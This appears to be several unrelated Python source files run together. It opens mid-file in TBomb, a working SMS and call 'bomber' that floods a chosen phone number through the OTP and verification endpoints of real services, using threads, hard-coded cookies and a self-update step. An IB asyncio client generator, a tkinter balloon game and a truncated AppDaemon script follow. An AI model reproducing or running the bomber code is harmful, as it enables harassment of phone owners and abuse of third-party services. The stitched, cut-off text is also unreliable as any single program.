rd = os.popen('curl -s -X POST -H "Host:www.aala.com" -H "Connection:keep-alive" -H "Accept:application/json, text/javascript, */*; q=0.01" -H "Origin:https://www.aala.com" -H "X-Requested-With:XMLHttpRequest" -H "Save-Data:on" -H "User-Agent:Mozilla/5.0 (Linux; Android 8.1.0; vivo 1718) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.101 Mobile Safari/537.36" -H "Content-Type:application/x-www-form-urlencoded; charset=UTF-8" -H "Referer:https://www.aala.com/" -H "Accept-Encoding:gzip, deflate, br" -H "Accept-Language:en-IN,en;q=0.9,en-GB;q=0.8,en-US;q=0.7,hi;q=0.6,ar;q=0.5" -H "Cookie:frontend=a27mn3h3irt1rlt6i55s93p9r5; frontend_cid=8zqBBzwQTMIt9UKg; _BEAMER_USER_ID_gADrycBn12870=c9fe4f7d-b421-4bad-9cf2-0a4db716dff4; G_ENABLED_IDPS=google" -d \'email=' + cc + pn + '&firstname=SpeedX&lastname=SpeedX\' "https://www.aala.com/accustomer/ajax/getOTP"').read().strip()
return rd.find('code:') != -1
elif lim == 16:
os.popen('curl -s -X POST -d \'method=SMS&countryCode=id&phoneNumber=' + cc + pn +
'&templateID=pax_android_production\' "https://api.grab.com/grabid/v1/phone/otp"')
return True
elif lim == 100:
rd = os.popen('curl -s -X GET "https://www.makaan.com/apis/nc/sendOtpOnCall/16257065/' +
pn + '?callType=otpOnCall"').read()
return rd.lower().find("new otp has been") != -1
elif lim == 101:
rd = os.popen('curl -s -X POST -d mobile=%2B' + cc + '-' + pn +
' https://marketing.tllms.com/elearn/api/v4/authentications/phone_call').read()
return rd.lower().find("otp requests exceeded") == -1
elif lim == 102:
rd = os.popen('curl -s -X POST -H "Host:www.realestateindia.com" -H "content-length:58" -H "accept:text/html, */*; q=0.01" -H "origin:https://www.realestateindia.com" -H "x-requested-with:XMLHttpRequest" -H "save-data:on" -H "user-agent:Mozilla/5.0 (Linux; Android 8.1.0; vivo 1718) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Mobile Safari/537.36" -H "content-type:application/x-www-form-urlencoded; charset=UTF-8" -H "referer:https://www.realestateindia.com/thanks.php?newreg" -H "accept-encoding:gzip, deflate, br" -H "accept-language:en-IN,en;q=0.9,en-GB;q=0.8,en-US;q=0.7,hi;q=0.6" -H "cookie:_gat=1" -H "cookie:rei_mem_mobile_verify_status=0" -H "cookie:rei_mem_email_verify_status=N" -H "cookie:rei_mem_block_status=0" -H "cookie:rei_member_country=IN" -H "cookie:rei_paid_status=0" -H "cookie:rei_member_type=1" -H "cookie:rei_member_email=Fakemam%40ril.com" -H "cookie:rei_member_name=Fakeman" -H "cookie:rei_member_id=1547045" -H "cookie:cooki_sess_id=9q8bsucj6mgvu2dc03bfsvlf07" -H "cookie:name=9q8bsucj6mgvu2dc03bfsvlf07" -H "cookie:_gid=GA1.2.626525909.1560836369" -H "cookie:_ga=GA1.2.1033079331.1560836369" -H "cookie:visitedToken=176961560836367" -d \'action_id=call_to_otp&mob_num=' + pn + '&member_id=1547045\' "https://www.realestateindia.com/mobile-script/indian_mobile_verification_form.php?sid=0.5983221395805354"').read()
return rd.lower().find("y") != -1
elif lim == 103:
os.system(
'curl -s -X POST -H "Host:www.olx.in" -H "content-length:44" -H "accept:*/*" -H "x-newrelic-id:VQMGU1ZVDxABU1lbBgMDUlI=" -H "origin:https://www.olx.in" -H "user-agent:Mozilla/5.0 (Linux; Android 5.0.2; SH-04G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Mobile Safari/537.36" -H "content-type:application/json" -H "referer:https://www.olx.in/" -H "accept-encoding:gzip, deflate, br" -H "accept-language:en-US,en;q=0.9" -H "cookie:onap=16b1b8f48d4x746d47ab-1-16b1b8f48d4x746d47ab-19-1559537345" -H "cookie:bm_sv=CDB97F50DA6615AC420F3E6E77B04E42~OoX2fAuP7ggcNa0VjzE95FzJNKRdJlW09Hja0/cysIGF1sJoBO7i0ndGXqnTWLaunlyxktHLbE8BSstPCRYn8VdP15lvUxK3ZY9ahXOSgwAidxwXd1jCe5wjIzYbiXp5eKNWfFpowhFbpxloe+SrbiE0YHJVPcCV5bmdsHgPfQc=" -H "cookie:AMP_TOKEN=%24NOT_FOUND" -H "cookie:hint=true" -H "cookie:_gid=GA1.2.369819276.1559535517" -H "cookie:_ga=GA1.2.665688753.1559535517" -H "cookie:ldTd=true" -H "cookie:G_ENABLED_IDPS=google" -H "cookie:HIDE_ONBOARDING_LOCATION=true" -H "cookie:testCookie=testCookie" -H "cookie:ak_bmsc=307C5311FB00A3F4E856AFFE1A9D000B0214BED9E0210000909FF45C1E802067~plFZfbMQGgEDr7OWVe9FvqfT24ZtOVMamtYcaip71IYOrv2+SQ6fokSvMk2Uesz5v1sFfaichbtDgeVSj3te3vXJKezSWgvoVWrK7gfzFrLz1ruBm0MQj01V5CmpaTr6tRgDRSN6bks3nqvOHzR0tA1IoqfDfq2MKtmDjbknCI5FlLYUTwqlnwHowYArfybn2n3yilE6VKHjW+tH8kqjAfH8BGuijpmO9pNkgmIyOeaZIVM3k6FGOL3Wj3jLI8uGaU" -H "cookie:_abck=153BD3D333948A58932748CAC3D4C3F40214BED9E0210000909FF45C18838E05~0~8O+udxdG38sBFTPZpaBL4IGj7eUcKJ1VwAtJ52GMO5E=~-1~-1" -H "cookie:bm_sz=BD665D919F7C6FA8374F196445596436~YAAQ2b4UArpOAwtrAQAAq0qPGwNksHBgphLwDzwfBlwIRQJAG7txmjBo/of7NiAJ93gy/7vBhQ9l5sIKdwtl2j+U4bys2Hhh5tZlZL/jqdnW/JrgmgawcxiunAJ32BbY9UtnFIrNxbbRvzQCYnSwf/cz9a7jURsui7leuLaVm7mQEcHPOtC6g5jrToAMTbdA" -H "cookie:97c09e2aabdfed89b87a3010d7f13c64=353b4f9fd82d26268ad11b2c1e9ae019" -H "cookie:lqstatus=1559536704" -H "cookie:laquesis=pan-26381@a#pan-27752@b#pan-30043@b#pana-26381@b" -d \'{"type":"call","descriptor":"+91' + pn + '"}\' "https://www.olx.in/api/challenges" >/dev/null 2>&1')
return True
elif lim == 104:
rd = os.popen('curl -s -X GET -H "Host:api.magicbricks.com" -H "Connection:keep-alive" -H "User-Agent:Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.89 Safari/537.36" -H "Save-Data:on" -H "Accept:image/webp,image/apng,image/*,*/*;q=0.8" -H "Accept-Encoding:gzip, deflate, br" -H "Accept-Language:en-IN,en;q=0.9,en-GB;q=0.8,en-US;q=0.7,hi;q=0.6" "https://api.magicbricks.com/bricks/verifyOnCall.html?mobile=' + pn + '"').read().decode('utf-8')
return rd.lower().strip().find('callmade') != -1
elif lim == 106:
rd = os.popen(
'curl -s "https://www.myupchar.com/user_profile/resend_otp_via_voice?id=' + pn + '"').read()
return rd.find("1") != -1
return False
def remsp(num):
num = num.replace(' ', '')
num = num.replace('-', '')
return num
def start(target, counter, delay, ch, cc):
clr()
banner()
failed = 0
requested = 0
success = int(requested) - int(failed)
bombs = int(counter) + 1
while success < (int(bombs)):
os.system('clear')
banner()
try:
api = random.choice(ch)
except Exception:
if cc == "91":
print('Sorry All APIs Have Expired Please Update TBomb')
input('Press Enter To Exit...')
exit()
else:
if success > 0:
print(
'\n\n\tWe Are Sorry To Say That Bombing Limit For Your Country Has Been Reached...')
print(
'\nWe Are Working Too Hard To Increase The International Limit...')
input(
'\nThis will help us to give support to your country fast...\n\nPress Enter To Exit...')
os.system('rm *.xxx* > /dev/null 2>&1')
print('\n\n')
banner()
exit()
else:
print('\n\n\tSorry Your Country is Not Supported...')
print(
'\t\tTo Let Us Know...')
input('Press Enter To Exit...')
exit()
print(random.choice(colors))
print("==================================================================")
print(" BOMBING in progress, please wait !! ")
print(" Please keep your data connection active during bombing !! ")
print("==================================================================")
print(" Target Number : +" + str(cc) + " ", target)
print(" Number of Requests Sent : ", requested)
print(" Successful Requests : ", success)
print(" Failed Requests : ", failed)
print("==================================================================")
print(" Use this for fun, not for revenge !! ")
print(" This Bomber Was Created By sparkz-technology !! ")
print("==================================================================")
try:
result = getapi(target, api, cc)
except Exception:
result = False
requested = requested + 1
if result:
success = success + 1
else:
failed = failed + 1
while ch.count(api) > 0:
ch.remove(api)
time.sleep(float(delay))
if requested % 3 == 0:
checkinternet()
print(W)
print('\n\nBombing Completed..')
os.system('rm *.xxx* > /dev/null 2>&1')
banner()
exit()
def update():
stuff_to_update = ['bomber.py', '.version']
for fl in stuff_to_update:
dat = urllib.request.urlopen(
"https://raw.githubusercontent.com/sparkz-technology/TBomb/master/" + fl).read()
file = open(fl, 'wb')
file.write(dat)
file.close()
print('\n\t\tUpdated Successfull !!!!')
print('\tPlease Run The Script Again...')
exit()
clr()
banner()
try:
urllib.request.urlopen('https://www.google.com')
except Exception:
print("You are not connected To Internet!!!")
print("\tPlease Connect To Internet To Continue...\n")
input('Exiting....\n Press Enter To Continue....')
exit()
print('\tChecking For Updates...')
ver = urllib.request.urlopen(
"https://raw.githubusercontent.com/TheSpeedX/TBomb/master/.version").read().decode('utf-8')
verl = ''
try:
verl = open(".version", 'r').read()
except Exception:
pass
if ver != verl:
print('\n\t\tAn Update is Available....')
print('\tStarting Update...')
update()
print("Your Version is Up-To-Date")
print('\n\n\t\t\tStarting TBomb...\n\n')
try:
noti = urllib.request.urlopen(
"https://raw.githubusercontent.com/TheSpeedX/TBomb/master/.notify").read().decode('utf-8')
noti = noti.upper().strip()
if len(noti) > 10:
print('\n\n\tNOTIFICATION: ' + noti + '\n\n')
except Exception:
pass
while True:
pn = ""
cc = input("\tEnter Your Country Code (Without +) : ")
if '+' in cc:
tc = list(cc)
tc.remove('+')
cc = ''.join(tc)
cc = cc.strip()
pn = input("\tEnter Target Number: +" + cc + " ")
pn = remsp(pn)
if len(cc) >= 4 or len(cc) < 1:
print('\n\nInvalid Country Code..\n\t\tCountry Codes Are Generally 1-3 digits...\n')
continue
if len(pn) <= 6:
print('\n\nInvalid Phone Number..\n')
continue
for cch in str(cc + pn):
if not cch.isdigit():
print('\n\nPhone Number Must Consist Of Numbers Only\n')
continue
break
type = 0
try:
if sys.argv[1] == "call":
type = 1
except Exception:
type = 0
if type == 1:
nm = int(input("Enter Number of Calls To Send(Maximum 15): "))
if nm > 15:
print("\t\tYou Have Entered " + str(nm) +
".\n\tNormalizing Value To 15")
nm = 15
dl = float(input("Enter Delay time (in seconds) [Recommended 10 sec ] : "))
elif type == 0:
if cc == "91":
nm = int(input("Enter Number of Messages To Send(0 For Unlimited): "))
dl = float(
input("Enter Delay time (in seconds) [Recommended 2 sec ] : "))
else:
nm = int(input("Enter Number of Messages To Send: "))
dl = float(
input("Enter Delay time (in seconds) [Recommended 10 sec ] : "))
maxlim = 0
if cc == "91":
maxlim = 500
else:
maxlim = 100
if nm > maxlim:
print('\n\n\tSorry Due To Misuse Of This Script We Only Provide ' +
str(maxlim) + ' SMS At Once...\n\n')
print('Number Of SMS Has been Set To ' + str(maxlim))
nm = maxlim
if not cc.strip() == "91":
if type == 1:
print(
'\t\tSorry But Call Bombing is Currently Supported Only For Indian Numbers!!!!')
print()
input('Press Enter To Exit....')
print('\n\n')
banner()
exit()
cnt = 0
if pn.strip() == '' or dl <= 0 or nm <= 0 or cc.strip() == '' or cc.find('+') != -1:
print('\n\n\tSeems Like You Have Given Wrong Inputs...')
input('\n\t\tPress Enter To Exit...')
banner()
exit()
ch = [0, 14, 15, 16]
start(pn, nm, dl, ch, str(cc))
exit()
ch = [i for i in range(17)]
cbomb = False
if pn.strip() == '' or dl <= 0 or nm < 0:
print('\n\n\tSeems Like You Have Given Wrong Inputs...')
input('\n\t\tPress Enter To Exit...')
banner()
exit()
if type == 1:
print("NOTE: Call Bomb Might Not Work on DND Activated Numbers...\n")
print("\n\tPlease Don't Overload Call Bomb So That Is Would Work For Longer Period Of Time...")
cbomb = True
if cbomb:
chl = [100, 101, 102, 103, 104, 105, 106]
start(pn, nm, dl, chl, str(cc))
exit()
if nm == 0:
nt = int(input("\tNumber Of Threads(10 to 20) : "))
if nt <= 0 or nt >= 30:
print('\tTBomb Shows Better Result in 10 to 25 Threads\n\t\tStill Continuing....')
print("\n\nPlease Remember That This Is in Experimental Stage And Is Incredibly Fast...")
t = [None] * nt
print(random.choice(colors))
print("\n\n==================================================================")
print(" Gearing Up Bomber, please wait !! ")
print(" Please keep your data connection active during bombing !! ")
print("==================================================================")
print(" Target Number : +91", pn)
print(" Number of Threads : ", nt)
print(" Delay : ", dl)
print("==================================================================")
print(" Use this for fun, not for revenge !! ")
print(" This Bomber Was Created By Sparkz-technology !! ")
print("==================================================================")
print(W)
input('\n\nPress CTRL+Z To STOP Bomber... \nPress Enter To Start Bomber...\n')
os.system('rm *.xxx* > /dev/null 2>&1')
print("\n\nStarting Bomb....")
for i in range(nt):
t[i] = threading.Thread(target=infinite, args=(pn, dl, ch, maxlim,))
t[i].daemon = True
t[i].start()
time.sleep(2)
ci = 0
while True:
ci += 1
l = count_inf
print(" Total Number of Requests Sent : ", l)
if int(l) > maxlim:
print('\n\n\tSorry Due To Misuse Of This Script We Only Provide ' +
str(maxlim) + ' SMS At Once...\n\n')
input('Press Enter To Exit...')
os.system('rm *xxx* > /dev/null 2>&1')
banner()
exit()
time.sleep(1)
if ci % 3 == 0:
checkinternet()
else:
start(pn, nm, dl, ch, '91')
exit()
|
asyncio_client_generator.py
|
from ib_tws_server.codegen.generator_utils import GeneratorUtils
from ib_tws_server.api_definition import *
from ib_tws_server.codegen.generator_utils import *
import inspect
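# Descriptive note (added): code generators that emit an asyncio-friendly client
# (AsyncioClient) and an EWrapper subclass (AsyncioWrapper) from the REQUEST_DEFINITIONS table.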
def forward_method_parameters_dict_style(params: List[inspect.Parameter]) -> str:
return ",".join([ f"{v.name} = {v.name}" for v in params ])
def request_state_member_name(d: ApiDefinition):
return f"_req_state"
def subscription_member_name(d: ApiDefinition):
return f"_subscriptions"
def response_instance(d: ApiDefinition, m: Callable):
callback_type,is_wrapper = GeneratorUtils.callback_type(d, m)
if is_wrapper:
return f"{callback_type}({forward_method_parameters_dict_style(GeneratorUtils.data_class_members(d, [m], False))})"
else:
return GeneratorUtils.data_class_members(d, [m], False)[0].name
def streaming_instance(d: ApiDefinition, m: Callable):
callback_type,is_wrapper = GeneratorUtils.callback_type(d, m)
if is_wrapper:
return f"{callback_type}({forward_method_parameters_dict_style(GeneratorUtils.data_class_members(d, [m], True))})"
else:
return GeneratorUtils.data_class_members(d, [m], False)[0].name
def request_id(d: ApiDefinition, m: Callable):
if not d.uses_req_id:
return f"'{d.request_method.__name__}'"
else:
return GeneratorUtils.req_id_param_name(m)
def current_request_state(d: ApiDefinition, m: Callable):
return f"self.{request_state_member_name(d)}[{request_id(d, m)}]"
def bind_method(d: ApiDefinition, m: Callable, param_values: List[str]) -> str:
param_values[0] = f"self._client.{m.__name__}"
return f"functools.partial({','.join(param_values)})"
class AsyncioClientGenerator:
@staticmethod
def generate(filename):
def init_callback(d: ApiDefinition, m: Callable, cb: str):
if d.callback_methods is not None or d.done_method is not None:
return f"{current_request_state(d,m)}.{cb} = {cb}"
return ""
def init_request_id(d: ApiDefinition, u: Callable):
if d.uses_req_id:
return f"{GeneratorUtils.req_id_param_name(d.request_method)} = self.next_request_id()"
else:
return ""
def init_subscription(d: ApiDefinition):
if d.cancel_method is None:
raise RuntimeError(f"Request does not support cancellation {d.request_method.__name__}")
current_subscription = f"self.{subscription_member_name(d)}[{request_id(d, d.request_method)}]"
return f"{current_subscription}= SubscriptionGenerator(self.__{d.cancel_method.__name__}, {GeneratorUtils.req_id_param_name(d.request_method)})"
def async_request_method(d: ApiDefinition, is_subscription: bool):
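            # Emit the source for one async request method: subscriptions return a
            # SubscriptionGenerator, requests with callbacks await a future resolved by the
            # wrapper, and fire-and-forget requests just queue the call and return None.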
method_name = GeneratorUtils.request_method_name(d, is_subscription)
original_sig = GeneratorUtils.signature(d.request_method)
signature = GeneratorUtils.request_signature(d, is_subscription)
param_values = [ p.name if p.name != d.subscription_flag_name else f"{d.subscription_flag_value if is_subscription else not d.subscription_flag_value}" for p in original_sig.parameters.values() ]
if is_subscription:
return f"""
async def {method_name}{signature}:
{GeneratorUtils.doc_string(d.request_method)}
{init_request_id(d, d.request_method)}
ret: SubscriptionGenerator = None
with self._lock:
ret = {init_subscription(d)}
self._writer.queue.put({bind_method(d, d.request_method, param_values)})
return ret"""
if d.callback_methods is not None or d.done_method is not None:
return f"""
async def {method_name}{signature}:
{GeneratorUtils.doc_string(d.request_method)}
loop = asyncio.get_running_loop()
future = loop.create_future()
def cb(res: {GeneratorUtils.request_return_type(d, is_subscription)}):
loop.call_soon_threadsafe(future.set_result, res)
{init_request_id(d, d.request_method)}
with self._lock:
{init_callback(d, d.request_method, 'cb')}
self._writer.queue.put({bind_method(d, d.request_method, param_values)})
res = (await future)
if isinstance(res, IbError):
raise res
return res"""
else:
return f"""
async def {method_name}{signature}:
{GeneratorUtils.doc_string(d.request_method)}
{init_request_id(d, d.request_method)}
self._writer.queue.put({bind_method(d, d.request_method, param_values)})
return None"""
def cancel_method(d: ApiDefinition):
return f"""
def __{GeneratorUtils.method_declaration(d.cancel_method)}:
{GeneratorUtils.doc_string(d.cancel_method)}
self.cancel_request({request_id(d,d.cancel_method)})
self._writer.queue.put({bind_method(d, d.cancel_method, list(GeneratorUtils.signature(d.cancel_method).parameters))})"""
with open(filename, "w") as f:
f.write(f"""
import asyncio
import functools
from collections import defaultdict
from ibapi.client import EClient
from ib_tws_server.asyncio.ib_writer import IBWriter
from ib_tws_server.asyncio.request_state import *
from ib_tws_server.asyncio.subscription_generator import SubscriptionGenerator
from ib_tws_server.error import *
from ib_tws_server.gen.client_responses import *
from ib_tws_server.gen.asyncio_wrapper import *
from ib_tws_server.ib_imports import *
from threading import Lock, Thread
import time
from typing import Callable, Dict, List, Tuple
class AsyncioClient():
_lock: Lock
_req_state: Dict[str, RequestState]
_subscriptions: Dict[int, SubscriptionGenerator]
_wrapper: AsyncioWrapper
_client: EClient
def __init__(self):
self._lock = Lock()
self._current_request_id = 0
self._req_state = defaultdict(RequestState)
self._subscriptions = defaultdict(SubscriptionGenerator)
self._wrapper = AsyncioWrapper(self._lock, self._req_state, self._subscriptions)
self._client = EClient(self._wrapper)
self._writer = IBWriter(self._client)
self._wrapper._writer = self._writer
def run(self):
self._writer.start()
self._client.run()
def next_request_id(self):
with self._lock:
self._current_request_id += 1
return self._current_request_id
def disconnect(self, clean=False):
self._wrapper._expecting_disconnect = clean
return self._client.disconnect()
def cancel_request(self, id: RequestId):
response_cb = None
with self._lock:
if id in self._req_state:
response_cb = self._req_state[id].cb
del self._req_state[id]
if id in self._subscriptions:
del self._subscriptions[id]
if response_cb is not None:
response_cb(None)
def start(self, host: str, port: int, client_id: int, connection_retry_interval: int):
while True:
try:
self._client.connect(host, port, client_id)
break
except ConnectionError as e:
if connection_retry_interval > 0:
time.sleep(connection_retry_interval)
else:
raise e
thread = Thread(target = self.run)
thread.start()
setattr(thread, "_thread", thread)
def active_request_count(self):
with self._lock:
return len(self._req_state)
def active_subscription_count(self):
with self._lock:
return len(self._subscriptions)
"""
)
for d in REQUEST_DEFINITIONS:
if d.request_method is not None:
if d.subscription_flag_name is not None:
f.write(async_request_method(d, False))
f.write(async_request_method(d, True))
else:
f.write(async_request_method(d, d.is_subscription))
if d.cancel_method is not None and (d.is_subscription or d.subscription_flag_name is not None):
f.write(cancel_method(d))
class AsyncioWrapperGenerator:
@staticmethod
def generate(filename):
def update_response(d: ApiDefinition, m:Callable):
if GeneratorUtils.response_is_list(d):
return f"""
if {request_id(d, m)} in self._req_state:
req_state = {current_request_state(d, m)}
if req_state.response is None:
req_state.response = []
req_state.response.append({response_instance(d, m)})"""
else:
return f"""
if {request_id(d, m)} in self._req_state:
req_state = {current_request_state(d, m)}
if req_state is not None:
req_state.response = {response_instance(d, m)}"""
def call_response_cb(d: ApiDefinition, m: Callable):
if d.callback_methods is not None:
return f"self.call_response_cb({request_id(d,m)})"
else:
return ""
def call_response_cb_if_done(d: ApiDefinition, m: Callable):
if d.has_done_flag:
return f"""
if (done):
{call_response_cb(d, m)}"""
elif not GeneratorUtils.response_is_list(d):
return f"""
{call_response_cb(d,m)}"""
else:
return ""
def callback_method(d: ApiDefinition, m: Callable):
if d.subscription_flag_name is not None:
return f"""
def {GeneratorUtils.method_declaration(m)}:
{GeneratorUtils.doc_string(m)}
is_subscription: bool = False
with self._lock:
is_subscription = {request_id(d, m)} in self._subscriptions
{update_response(d, m)}
if is_subscription:
self.call_streaming_cb({request_id(d,m)}, {streaming_instance(d,m)})
return
{call_response_cb_if_done(d, m)}"""
elif not d.is_subscription:
return f"""
def {GeneratorUtils.method_declaration(m)}:
{GeneratorUtils.doc_string(m)}
with self._lock:
{update_response(d, m)}
{call_response_cb_if_done(d, m)}"""
else:
return f"""
def {GeneratorUtils.method_declaration(m)}:
{GeneratorUtils.doc_string(m)}
self.call_streaming_cb({request_id(d,m)}, {streaming_instance(d,m)})"""
def done_method(d: ApiDefinition):
return f"""
def {GeneratorUtils.method_declaration(d.done_method)}:
{GeneratorUtils.doc_string(d.done_method)}
{call_response_cb(d,d.done_method)}"""
with open(filename, "w") as f:
f.write(f"""
from ibapi.wrapper import EWrapper
from ib_tws_server.asyncio.ib_writer import IBWriter
from ib_tws_server.asyncio.request_state import *
from ib_tws_server.asyncio.subscription_generator import SubscriptionGenerator
from ib_tws_server.error import *
from ib_tws_server.gen.client_responses import *
from ib_tws_server.ib_imports import *
from threading import Lock
from typing import Dict, List
class AsyncioWrapper(EWrapper):
_lock: Lock
_req_state: Dict[str, RequestState]
_subscriptions: Dict[int, SubscriptionGenerator]
_expecting_disconnect: bool
_writer: IBWriter
def __init__(self, lock: Lock, req_state: Dict[str, RequestState], subscriptions: Dict[int, SubscriptionGenerator]):
self._lock = lock
self._req_state = req_state
self._subscriptions = subscriptions
EWrapper.__init__(self)
self._expecting_disconnect = False
def connectionClosed(self):
if self._expecting_disconnect:
# Wake up writer
self._writer.queue.put(lambda *a, **k: None)
else:
raise ConnectionError("Unexpected disconnect")
def call_response_cb(self, id: RequestId, res=None):
cb = None
with self._lock:
if not id in self._req_state:
return
s = self._req_state[id]
cb = s.cb
if res is None:
res = s.response
del self._req_state[id]
if cb is not None:
cb(res)
def error(self, reqId: int, errorCode: int, errorString: str):
cb = None
if reqId is not None:
with self._lock:
if reqId in self._req_state:
s = self._req_state[reqId]
cb = s.cb
del self._req_state[reqId]
if cb is not None:
cb(IbError(errorString, errorCode))
else:
super().error(reqId, errorCode, errorString)
def call_streaming_cb(self, id: RequestId, res: any):
cb = None
loop = None
with self._lock:
if id in self._subscriptions:
s = self._subscriptions[id]
cb = s.add_to_queue
loop = s._loop
if loop is not None:
loop.call_soon_threadsafe(cb, res)
""")
for d in REQUEST_DEFINITIONS:
if d.request_method is not None:
if d.callback_methods is not None:
for m in d.callback_methods:
f.write(callback_method(d, m))
if d.done_method is not None:
f.write(done_method(d))
|
main.py
|
"""
MIT License
Copyright (c) 2021 Jiusoft
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
Author: Jothin kumar (https://jothin-kumar.github.io/)
"""
import tkinter as tk
from random import randint
from time import sleep
from threading import Thread
from playsound import playsound
root = tk.Tk()
root.wm_title('Balloon game - Jiusoft')
fullscreen = False
def enter_fullscreen():
global fullscreen
fullscreen = True
fullscreen_button['text'] = 'Exit fullscreen'
root.attributes('-fullscreen', True)
def exit_fullscreen():
global fullscreen
fullscreen = False
    fullscreen_button['text'] = 'Enter fullscreen'
root.attributes('-fullscreen', False)
def enter_or_exit_fullscreen():
if fullscreen:
exit_fullscreen()
elif not fullscreen:
enter_fullscreen()
fullscreen_button = tk.Button(master=root, text='', command=enter_or_exit_fullscreen)
fullscreen_button.pack(side=tk.RIGHT, anchor=tk.NE)
enter_fullscreen()
score_label = tk.Label(master=root, text='Score: 0')
def set_score(score: int):
score_label['text'] = f'Score: {score}'
score_label.pack(side=tk.TOP, fill=tk.X)
play_area = tk.Canvas(master=root, bg='snow', width=750, height=750)
play_area.pack(side=tk.TOP)
score = 0
def increase_score(evt):
global score
score += 1
set_score(score)
def play_pop():
playsound('Pop.mp3', True)
Thread(target=play_pop).start()
def create_rectangle_in_random_spot():
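    # Game loop (runs on a background thread): keep moving a clickable rectangle to a
    # random spot, speeding up from 1.5s to 1s to 0.5s per move; exits via the caught
    # RuntimeError once the Tk window is destroyed.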
previous_rectangle = None
try:
for _ in range(20):
if previous_rectangle is not None:
play_area.delete(previous_rectangle)
base = randint(0, 600)
rectangle = play_area.create_rectangle(base, base + 50, base + 100, base + 150, fill='red',
outline='red')
play_area.tag_bind(rectangle, '<Button-1>', increase_score)
previous_rectangle = rectangle
sleep(1.5)
for _ in range(30):
play_area.delete(previous_rectangle)
base = randint(0, 600)
rectangle = play_area.create_rectangle(base, base + 50, base + 100, base + 150, fill='red',
outline='red')
play_area.tag_bind(rectangle, '<Button-1>', increase_score)
previous_rectangle = rectangle
sleep(1)
while True:
play_area.delete(previous_rectangle)
base = randint(0, 600)
rectangle = play_area.create_rectangle(base, base + 50, base + 100, base + 150, fill='red',
outline='red')
play_area.tag_bind(rectangle, '<Button-1>', increase_score)
previous_rectangle = rectangle
sleep(0.5)
except RuntimeError:
pass
Thread(target=create_rectangle_in_random_spot).start()
root.mainloop()
|
appdaemon.py
|
#!/usr/bin/python3
from pkg_resources import parse_version
import json
import sys
import importlib
import traceback
import configparser
import argparse
import logging
import os
import os.path
from websocket import create_connection
from logging.handlers import RotatingFileHandler
from queue import Queue
from sseclient import SSEClient
import threading
import appdaemon.conf as conf
import time
import datetime
import signal
import uuid
import astral
import pytz
import appdaemon.homeassistant as ha
import platform
import math
import appdaemon.appdash as appdash
import asyncio
import concurrent
from urllib.parse import urlparse
import yaml
import random
__version__ = "2.0.3"
# Windows does not have Daemonize package so disallow
if platform.system() != "Windows":
from daemonize import Daemonize
q = Queue(maxsize=0)
config = None
config_file_modified = 0
config_file = ""
was_dst = None
last_state = None
reading_messages = False
inits = {}
ws = None
def init_sun():
latitude = conf.latitude
longitude = conf.longitude
    if not -90 <= latitude <= 90:
        raise ValueError("Latitude needs to be -90 .. 90")
    if not -180 <= longitude <= 180:
        raise ValueError("Longitude needs to be -180 .. 180")
elevation = conf.elevation
conf.tz = pytz.timezone(conf.time_zone)
conf.location = astral.Location((
'', '', latitude, longitude, conf.tz.zone, elevation
))
def update_sun():
# now = datetime.datetime.now(conf.tz)
now = conf.tz.localize(ha.get_now())
mod = -1
while True:
try:
next_rising_dt = conf.location.sunrise(
now + datetime.timedelta(days=mod), local=False
)
if next_rising_dt > now:
break
except astral.AstralError:
pass
mod += 1
mod = -1
while True:
try:
next_setting_dt = conf.location.sunset(
now + datetime.timedelta(days=mod), local=False
)
if next_setting_dt > now:
break
except astral.AstralError:
pass
mod += 1
old_next_rising_dt = conf.sun.get("next_rising")
old_next_setting_dt = conf.sun.get("next_setting")
conf.sun["next_rising"] = next_rising_dt
conf.sun["next_setting"] = next_setting_dt
if old_next_rising_dt is not None and old_next_rising_dt != conf.sun["next_rising"]:
# dump_schedule()
process_sun("next_rising")
# dump_schedule()
if old_next_setting_dt is not None and old_next_setting_dt != conf.sun["next_setting"]:
# dump_schedule()
process_sun("next_setting")
# dump_schedule()
def is_dst():
return bool(time.localtime(ha.get_now_ts()).tm_isdst)
# noinspection PyUnusedLocal
def handle_sig(signum, frame):
global ws
if signum == signal.SIGUSR1:
dump_schedule()
dump_callbacks()
dump_objects()
dump_queue()
dump_sun()
if signum == signal.SIGHUP:
read_apps(True)
if signum == signal.SIGINT:
ha.log(conf.logger, "INFO", "Keyboard interrupt")
conf.stopping = True
if ws is not None:
ws.close()
conf.appq.put_nowait({"event_type": "ha_stop", "data": None})
def dump_sun():
ha.log(conf.logger, "INFO", "--------------------------------------------------")
ha.log(conf.logger, "INFO", "Sun")
ha.log(conf.logger, "INFO", "--------------------------------------------------")
ha.log(conf.logger, "INFO", conf.sun)
ha.log(conf.logger, "INFO", "--------------------------------------------------")
def dump_schedule():
if conf.schedule == {}:
ha.log(conf.logger, "INFO", "Schedule is empty")
else:
ha.log(conf.logger, "INFO", "--------------------------------------------------")
ha.log(conf.logger, "INFO", "Scheduler Table")
ha.log(conf.logger, "INFO", "--------------------------------------------------")
for name in conf.schedule.keys():
ha.log(conf.logger, "INFO", "{}:".format(name))
for entry in sorted(
conf.schedule[name].keys(),
key=lambda uuid_: conf.schedule[name][uuid_]["timestamp"]
):
ha.log(
conf.logger, "INFO",
" Timestamp: {} - data: {}".format(
time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(
conf.schedule[name][entry]["timestamp"]
)),
conf.schedule[name][entry]
)
